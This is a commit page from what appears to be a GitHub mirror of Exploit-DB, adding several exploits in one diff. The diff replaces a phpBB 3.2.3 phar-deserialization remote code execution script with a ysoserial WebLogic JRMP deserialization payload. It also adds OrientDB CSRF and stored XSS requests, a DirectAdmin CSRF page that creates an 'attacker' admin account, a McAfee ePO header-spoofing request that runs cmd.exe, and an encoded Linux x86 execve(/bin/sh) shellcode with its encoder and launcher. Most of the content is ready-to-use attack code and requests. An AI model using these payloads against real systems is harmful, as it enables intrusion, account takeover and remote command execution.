bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-03-09

Browse source 
5 changes to exploits/shellcodes

Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)

phpBB 3.2.3  - Remote Code Execution
OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting
McAfee ePO 5.9.1 - Registered Executable Local Access Bypass
DirectAdmin 1.55 - 'CMD_ACCOUNT_ADMIN' Cross-Site Request Forgery

Linux/x86 - INSERTION Encoder / Decoder execve(/bin/sh) Shellcode (88 bytes)
This commit is contained in:
Offensive Security 2019-03-09 05:02:48 +00:00
parent 880bbe402e
commit 790ba4b35e
7 changed files with 528 additions and 64 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

112
exploits/multiple/remote/46513.java
View file

@ -1,64 +1,52 @@
// All greets goes to RIPS Tech
// Run this JS on Attachment Settings ACP page
var plupload_salt = '';
var form_token = '';
var creation_time = '';
var filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip
// your payload here
var payload = '<?php __HALT_COMPILER(); ?>\x0d\x0a\xfe\x01\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01'+'\x00'.repeat(5)+'\xc8\x01\x00\x00O:31:"GuzzleHttp\x5cCookie\x5cFileCookieJar":4:{s:41:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00filename";s:30:"/var/www/html/phpBB3/pinfo.php";s:52:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00storeSessionCookies";b:1;s:36:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00cookies";a:1:{i:0;O:27:"GuzzleHttp\x5cCookie\x5cSetCookie":1:{s:33:"\x00GuzzleHttp\x5cCookie\x5cSetCookie\x00data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:17:"<?php phpinfo();#";}}}s:39:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00strictMode";N;}\x08\x00\x00\x00test.txt\x04\x00\x00\x00K>\x10\x5c\x04\x00\x00\x00\x0c~\x7f\xd8\xb6\x01'+'\x00'.repeat(6)+'test\xa0\x17\xd2\xe0R\xcf \xf6T\x1d\x01X\x91(\x9dD]X\x0b>\x02\x00\x00\x00GBMB';
var byteArray = Uint8Array.from(payload, function(c){return c.codePointAt(0);});
var sid = (new URL(document.location.href)).searchParams.get('sid');
var url = '/adm/index.php';
var getparams = {
'i': 'acp_database',
'sid': sid,
'mode': 'backup'
};
$.get(url, getparams, function(data) {
form_token = $(data).find('[name="form_token"]').val();
creation_time = $(data).find('[name="creation_time"]').val();
if(form_token && creation_time) {
var posturl = '/adm/index.php?i=acp_database&sid=|&mode=backup&action=download';
var postdata = {
'type': 'data',
'method': 'text',
'where': 'download',
'table[]': 'phpbb_config',
'submit': 'Submit',
'creation_time': creation_time,
'form_token': form_token
}
$.post(posturl.replace("|", sid), postdata, function (data) {
plupload_salt = data.match(/plupload_salt',\s*'(\w{32})/)[1];
if (plupload_salt) {
filepath = filepath.replace("$salt", plupload_salt);
var postdata = new FormData();
postdata.append('name', 'evil.zip');
postdata.append('chunk', 0);
postdata.append('chunks', 2);
postdata.append('add_file', 'Add the file');
postdata.append('real_filename', 'evil.zip');
// file
var pharfile = new File([byteArray], 'evil.zip');
postdata.append('fileupload', pharfile);
jQuery.ajax({
url: '/posting.php?mode=reply&f=2&t=1',
data: postdata,
cache: false,
contentType: false,
processData: false,
method: 'POST',
success: function(data){
if ("id" in data) {
$('#img_imagick').val(filepath).focus();
$('html, body').animate({
scrollTop: ($('#submit').offset().top)
}, 500);
}
}
});
// All respects goes to Zhiyi Zhang of 360 ESG Codesafe Team
// URL: https://blogs.projectmoon.pw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/
package ysoserial.payloads;
}
}, 'text');
import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub;
import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import java.lang.reflect.Proxy;
import java.rmi.registry.Registry;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.util.Random;
@SuppressWarnings ( {
"restriction"
} )
@PayloadTest( harness = "ysoserial.payloads.JRMPReverseConnectSMTest")
@Authors({ Authors.MBECHLER })
public class JRMPClient_20180718_bypass01 extends PayloadRunner implements
ObjectPayload<ReferenceWrapper_Stub> {
public ReferenceWrapper_Stub getObject ( final String command ) throws Exception {
String host;
int port;
int sep = command.indexOf(':');
if ( sep < 0 ) {
port = new Random().nextInt(65535);
host = command;
}
else {
host = command.substring(0, sep);
port = Integer.valueOf(command.substring(sep + 1));
}
ObjID id = new ObjID(new Random().nextInt());
TCPEndpoint te = new TCPEndpoint(host, port);
UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
ReferenceWrapper_Stub stud = new ReferenceWrapper_Stub(ref);
return stud;
}
});
public static void main ( final String[] args ) throws Exception {
Thread.currentThread().setContextClassLoader(JRMPClient_20180718_bypass01.class.getClassLoader());
PayloadRunner.run(JRMPClient_20180718_bypass01.class, args);
}
}

268
exploits/multiple/webapps/46517.txt Normal file
View file

@ -0,0 +1,268 @@
##################################################################################################################################
# Exploit Title: OrientDB 3.0.17 GA Community Edition (March 7th, 2019) | Multiple Vulnerabilities
# Date: 07.03.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://orientdb.org
# Software Link: https://orientdb.org/download
# Version: 3.0.17 GA Community Edition (March 7th, 2019)
##################################################################################################################################
Introduction
OrientDB is the worlds fastest graph database. Period. An independent
benchmark study by IBM and the Tokyo Institute of Technology showed that
OrientDB is 10x faster than Neo4j on graph operations among all the
workloads. Drive competitive advantage and accelerate innovation with new
revenue streams.
#################################################################################
Vulnerabilities: CSRF | XSS Reflected & Stored
#################################################################################
CSRF details:
#################################################################################
CSRF1
Create Database
POST /database/testdb/plocal/graph HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
Authorization: Basic cm9vdDpyb290
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=utf-8
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=-
Content-Length: 0
#################################################################################
CSRF2
Delete Database
DELETE /database/testdb HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
Authorization: Basic cm9vdDpyb290
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=-
#################################################################################
CSRF3
Schema Manage New Vertex
POST /command/demodb/sql/-/20?format=rid,type,version,class,graph HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
content-type: text/plain
X-Requested-With: XMLHttpRequest
Content-Length: 33
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825
CREATE CLASS `test` extends `V`
#################################################################################
CSRF4
Schema Manage Delete Vertex
POST /command/demodb/sql/-/20?format=rid,type,version,class,graph HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
content-type: text/plain
X-Requested-With: XMLHttpRequest
Content-Length: 17
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825
DROP CLASS `test`
#################################################################################
CSRF5
Add User
POST /document/demodb/-1:-1 HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=utf-8
Content-Length: 108
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825
{"@class":"OUser","@version":0,"@rid":"#-1:-1","name":"test","password":"test","roles":[],"status":"ACTIVE"}
#################################################################################
CSRF6
Delete User
DELETE /document/demodb/5:3 HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825
#################################################################################
CSRF7
Functions Management New
POST /document/demodb/-1:-1 HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=utf-8
Content-Length: 141
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825
{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"test","language":"javascript","code":null,"parameters":["test"]}
#################################################################################
CSRF8
Functions Management Delete
DELETE /document/demodb/6:5 HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825
#################################################################################
XSS details:
#################################################################################
XSS1 Stored
Add User
POST /document/demodb/-1:-1 HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=utf-8
Content-Length: 133
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825
{"@class":"OUser","@version":0,"@rid":"#-1:-1","name":"test<script>alert(1)</script>","password":"test","roles":[],"status":"ACTIVE"}
PoC
XSS works on Security Manager Actions - Delete
#################################################################################
XSS2 Reflected
URL
http://192.168.2.101:2480/document/demodb/-1:-1
METHOD
Post
PARAMETER
name
PAYLOAD
<script>alert(2)</script>
POST /document/demodb/-1:-1 HTTP/1.1
Host: 192.168.2.101:2480
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.101:2480/studio/index.html
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=utf-8
Content-Length: 162
DNT: 1
Connection: close
Cookie: CockpitLang=en-us; OSESSIONID=OS1551978095783-8372032249854396825
{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"test<script>alert(2)</script>","language":"javascript","code":null,"parameters":null}
PoC
XSS works on Functions Management - Save
#################################################################################

52
exploits/php/webapps/46520.txt Normal file
View file

@ -0,0 +1,52 @@
# Exploit title: DirectAdmin v1.55 - CSRF via CMD_ACCOUNT_ADMIN Admin Panel
# Date: 03/03/2019
# Exploit Author: ManhNho
# Vendor Homepage: https://www.directadmin.com/
# Software Link: https://www.directadmin.com/
# Demo Link: https://www.directadmin.com:2222/CMD_ACCOUNT_ADMIN
# Version: 1.55
# CVE: CVE-2019-9625
# Tested on: Windows 10 / Kali Linux
# Category: Webapps
#1. Description
-----------------------------------------------------
DirectAdmin v 1.55 have CSRF via CMD_ACCOUNT_ADMIN Admin Panel lead to
create new admin account
#2. PoC
-----------------------------------------------------
a) Send below crafted request to logged in user who is having admin
Administrator level access
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://server:2222/CMD_ACCOUNT_ADMIN" method="POST">
<input type="hidden" name="fakeusernameremembered" value="" />
<input type="hidden" name="fakepasswordremembered" value="" />
<input type="hidden" name="action" value="create" />
<input type="hidden" name="username" value="attacker" />
<input type="hidden" name="email" value="attacker&#64;mail&#46;com" />
<input type="hidden" name="passwd" value="123456" />
<input type="hidden" name="passwd2" value="123456" />
<input type="hidden" name="notify" value="yes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
b) Once the logged in user opens the URL the form will get submitted
with active session of administrator and action get performed
successfully.
#3. References
-----------------------------------------------------
https://github.com/ManhNho/CVEs/blob/master/New-Requests/DirectAdmin-CSRF
https://nvd.nist.gov/vuln/detail/CVE-2019-9625

45
exploits/windows/webapps/46518.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: McAfee ePO 5.9.1 Registered Executable Local Access Bypass
# Date: 2019-03-07
# Exploit Author: @leonjza
# Vendor Homepage: https://www.mcafee.com/
# Software Link: https://www.mcafee.com/enterprise/en-us/products/epolicy-orchestrator.html
# Version: ePO v5.9.1
# Tested on: Windows Server 2012
# CVE : cve-2018-6671
GIST LINK: https://gist.github.com/leonjza/17eb8ed9cba0ea1d2c70b82782c6d949
# CVE-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass
# Specifying an X-Forwarded-For header bypasses the local only check
# https://kc.mcafee.com/corporate/index?page=content&id=SB10240
# https://nvd.nist.gov/vuln/detail/CVE-2018-6671
#
# 2019 @leonjza
#
# Tested on ePO v5.9.1, missing hotfix EPO5xHF1229850
POST /Notifications/testRegExe.do HTTP/1.1
Host: 192.168.1.26:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0)
Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.26:8443/Notifications/addRegExecutable.do?orion.user.security.token=Bp5pZJOQll2vryhC
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 284
DNT: 1
Connection: close
Cookie: JSESSIONID=645BCB1CE5B7DBE1B9EDC7BB9F2F7349.route1;
orion.login.language="language:en&country:";
orion.content.size="width:1384&height:699";
JSESSIONIDSSO=4D970A5F2DBF48309F796DF38B80FC15
X-Forwarded-For: 127.0.0.1
orion.user.security.token=Bp5pZJOQll2vryhC&orion.user.security.token=Bp5pZJOQll2vryhC&executableName=CVE-2018-6671%20PoC&executablePath=c:\windows\system32\cmd.exe&userName=&pass=&passConfirm=&testExeArgs=/c
whoami > c:\CVE-2018-6671.txt&testExeTime=60000&objectId=0&ajaxMode=standard
--
L.
:wq!

7
files_exploits.csv
View file

@ -17238,7 +17238,7 @@ id,file,description,date,author,type,platform,port
46506,exploits/hardware/remote/46506.rb,"QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)",2019-03-07,AkkuS,remote,hardware,
46509,exploits/linux/remote/46509.rb,"Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)",2019-03-07,Metasploit,remote,linux,443
46510,exploits/php/remote/46510.rb,"Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)",2019-03-07,Metasploit,remote,php,
46513,exploits/multiple/remote/46513.java,"Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)",2019-10-25,allyshka,remote,multiple,
46513,exploits/multiple/remote/46513.java,"Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)",2018-10-25,allyshka,remote,multiple,
46514,exploits/multiple/remote/46514.js,"TeamCity < 9.0.2 - Disabled Registration Bypass",2018-03-28,allyshka,remote,multiple,
46516,exploits/multiple/remote/46516.py,"OpenSSH SCP Client - Write Arbitrary Files",2019-01-11,"Harry Sintonen",remote,multiple,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
@ -40962,4 +40962,7 @@ id,file,description,date,author,type,platform,port
46500,exploits/php/webapps/46500.txt,"OpenDocMan 1.3.4 - 'search.php where' SQL Injection",2019-03-05,"Mehmet EMIROGLU",webapps,php,80
46505,exploits/php/webapps/46505.txt,"Kados R10 GreenBee - Multiple SQL Injection",2019-03-07,"Mehmet EMIROGLU",webapps,php,80
46511,exploits/php/webapps/46511.js,"WordPress Core 5.0 - Remote Code Execution",2019-03-01,allyshka,webapps,php,
46512,exploits/php/webapps/46512.js,"phpBB 3.2.3 - Remote Code Execution",2019-12-12,allyshka,webapps,php,
46512,exploits/php/webapps/46512.js,"phpBB 3.2.3 - Remote Code Execution",2018-12-12,allyshka,webapps,php,
46517,exploits/multiple/webapps/46517.txt,"OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-08,"Ozer Goker",webapps,multiple,
46518,exploits/windows/webapps/46518.txt,"McAfee ePO 5.9.1 - Registered Executable Local Access Bypass",2019-03-08,leonjza,webapps,windows,
46520,exploits/php/webapps/46520.txt,"DirectAdmin 1.55 - 'CMD_ACCOUNT_ADMIN' Cross-Site Request Forgery",2019-03-08,ManhNho,webapps,php,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -949,3 +949,4 @@ id,file,description,date,author,type,platform
46396,shellcodes/macos/46396.c,"macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
46397,shellcodes/macos/46397.c,"macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
46499,shellcodes/linux_x86/46499.c,"Linux/x86 - XOR Encoder / Decoder execve(/bin/sh) Shellcode (45 bytes)",2019-03-05,"Daniele Votta",shellcode,linux_x86
46519,shellcodes/linux_x86/46519.c,"Linux/x86 - INSERTION Encoder / Decoder execve(/bin/sh) Shellcode (88 bytes)",2019-03-08,"Daniele Votta",shellcode,linux_x86

1 id file description date author type platform
949 46396 shellcodes/macos/46396.c macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes) 2019-02-18 Ken Kitahara shellcode macos
950 46397 shellcodes/macos/46397.c macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes) 2019-02-18 Ken Kitahara shellcode macos
951 46499 shellcodes/linux_x86/46499.c Linux/x86 - XOR Encoder / Decoder execve(/bin/sh) Shellcode (45 bytes) 2019-03-05 Daniele Votta shellcode linux_x86
952 46519 shellcodes/linux_x86/46519.c Linux/x86 - INSERTION Encoder / Decoder execve(/bin/sh) Shellcode (88 bytes) 2019-03-08 Daniele Votta shellcode linux_x86

107
shellcodes/linux_x86/46519.c Normal file
View file

@ -0,0 +1,107 @@
/*
'''
; Date: 07/03/2019
; Insertion-Encoder.asm
; Author: Daniele Votta
; Description: This program encode shellcode with insertion technique (0xAA).
; Tested on: i686 GNU/Linux
'''
#!/usr/bin/python
# Python Insertion Encoder
import random
# Execve /bin/sh (25 bytes)
shellcode =("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
encoded2 = ""
print 'Encoded shellcode...'
for x in bytearray(shellcode):
# Insertion Encoding
encoded += '\\x'
encoded += '%02x' % x
encoded += '\\x%02x' % 0xAA
# encoded += '\\x%02x' % random.randint(1,255)
encoded2 += '0x'
encoded2 += '%02x,' % x
encoded2 += '0x%02x,' % 0xAA
# encoded2 += '0x%02x' % random.randint(1,255)
print encoded +"\n"
print encoded2
print 'Len: %d' % len(bytearray(shellcode))
*/
#include<stdio.h>
#include<string.h>
/*
; Insertion-Decoder.asm
; Author: Daniele Votta
; Description: This program decode shellcode with insertion technique (0xAA).
; Tested on: i686 GNU/Linux
; Shellcode Length:50
; JMP | CALL | POP | Techniques
Insertion-Decoder: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: eb 1d jmp 804809f <call_decoder>
08048082 <decoder>:
8048082: 5e pop esi
8048083: 8d 7e 01 lea edi,[esi+0x1]
8048086: 31 c0 xor eax,eax
8048088: b0 01 mov al,0x1
804808a: 31 db xor ebx,ebx
0804808c <decode>:
804808c: 8a 1c 06 mov bl,BYTE PTR [esi+eax*1]
804808f: 80 f3 aa xor bl,0xaa
8048092: 75 10 jne 80480a4 <EncodedShellcode>
8048094: 8a 5c 06 01 mov bl,BYTE PTR [esi+eax*1+0x1]
8048098: 88 1f mov BYTE PTR [edi],bl
804809a: 47 inc edi
804809b: 04 02 add al,0x2
804809d: eb ed jmp 804808c <decode>
0804809f <call_decoder>:
804809f: e8 de ff ff ff call 8048082 <decoder>
080480a4 <EncodedShellcode>:
80480a4: 31 aa c0 aa 50 aa xor DWORD PTR [edx-0x55af5540],ebp
80480aa: 68 aa 2f aa 2f push 0x2faa2faa
80480af: aa stos BYTE PTR es:[edi],al
80480b0: 73 aa jae 804805c <_start-0x24>
80480b2: 68 aa 68 aa 2f push 0x2faa68aa
80480b7: aa stos BYTE PTR es:[edi],al
80480b8: 62 aa 69 aa 6e aa bound ebp,QWORD PTR [edx-0x55915597]
80480be: 89 aa e3 aa 50 aa mov DWORD PTR [edx-0x55af551d],ebp
80480c4: 89 aa e2 aa 53 aa mov DWORD PTR [edx-0x55ac551e],ebp
80480ca: 89 aa e1 aa b0 aa mov DWORD PTR [edx-0x554f551f],ebp
80480d0: 0b aa cd aa 80 aa or ebp,DWORD PTR [edx-0x557f5533]
80480d6: bb .byte 0xbb
80480d7: bb .byte 0xbb
[+] Extract Shellcode ...
"\xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb"
======================= POC Daniele Votta =======================
*/
/* Insertion Encoded Execve /bin/sh (88 bytes) */
unsigned char code[] = \
"\xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb";
int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}